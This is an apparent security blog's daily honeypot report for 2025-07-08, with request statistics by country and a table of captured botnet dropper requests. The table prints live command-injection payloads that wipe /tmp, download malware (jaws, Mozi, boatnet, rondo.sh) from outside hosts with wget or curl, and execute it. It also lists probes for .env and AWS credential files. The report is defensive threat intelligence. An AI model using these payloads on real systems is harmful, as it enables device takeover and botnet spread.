Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-07-08

·431 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-07-08
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 13 stage 1 IP address(es), linked to 6 dropper URL(s).

There are 20 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1519 requests were recorded during the day, originating from 13 different countries, with a peak of 817 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
41.226.204.243GET /shell?cd+/tmp;rm+-rf+*;wget+38.57.46.116/jaws;sh+/tmp/jaws HTTP/1.1
8.216.94.115GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.222.163.107GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.219.172.182GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
36.255.5.4827;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
144.172.115.127POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F160.187.246.7%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.1
8.215.192.72GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.222.212.69GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
66.63.179.126GET /shell?cd+/tmp;rm+-rf+*;wget+38.57.46.116/jaws;sh+/tmp/jaws HTTP/1.1
8.219.8.33GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.222.131.91GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
144.172.115.127POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F160.187.246.86%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.1
45.135.194.11GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28killall%20-9%20mipsel%20mpsl%3B%28wget%20-O-%20http%3A%2F%2F169.255.72.169%2Frondo.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F169.255.72.169%2Frondo.sh%7C%7Ccurl%20http%3A%2F%2F169.255.72.169%2Frondo.sh%29%20%7C%20sh%20-s%20tplink%3B%29 HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
3581GET /nmaplowercheck1751968022 HTTP/1.1
3591GET /gPNW HTTP/1.1
3741GET /Nmap/folder/check1751968022 HTTP/1.1
3791GET /NmapUpperCheck1751968022 HTTP/1.1
4281\x00\x0E8\xFC\x10\xB5*/NCZ\x00\x00\x00\x00\x00
5811GET /var/www/html/phpinfo.php HTTP/1.1
5861GET /api/.env/api/.env HTTP/1.1
5951GET /var/www/ HTTP/1.1
5981GET /.docker/ HTTP/1.1
5991GET /.github/ HTTP/1.1
6041GET /config/ HTTP/1.1
6071GET /.aws/credentials/login/ HTTP/1.1
6111GET /api/ HTTP/1.1
6271GET /phpversion HTTP/1.1
6301GET /debugger.php HTTP/1.1
6371GET /index.php?info HTTP/1.1
6441GET /diagnostics.php HTTP/1.1
6781GET /data/ HTTP/1.1
6851\x00\x0E8\x086\xBCvlNJ\xBA\x00\x00\x00\x00\x00
7561\x00\x0E8\xD8t\xD2,*\x00\xDB;\x00\x00\x00\x00\x00

country_iso_code
#

number_of_occurencecountry_iso_code
0817US
1138CN
2119SE
3101NL
453GB
546IR
638SC
728DE
828JP
919PL
1016IN
1113SG
1211BG
1311AU
1410CA
159RU
169HK
177GH
185ZA
194BE
204BR
213KR
223LT
233KZ
243MU
252IL
262MM
272AT
282TH
292IE
301AR
311VN
321TN
331ID
341ES
351GE
361KH
371JE
381AE
391UA
401EE

Related

Report: 2025-07-07
·1787 words
Repport Daily
Report: 2025-07-06
·307 words
Repport Daily
Report: 2025-07-05
·484 words
Repport Daily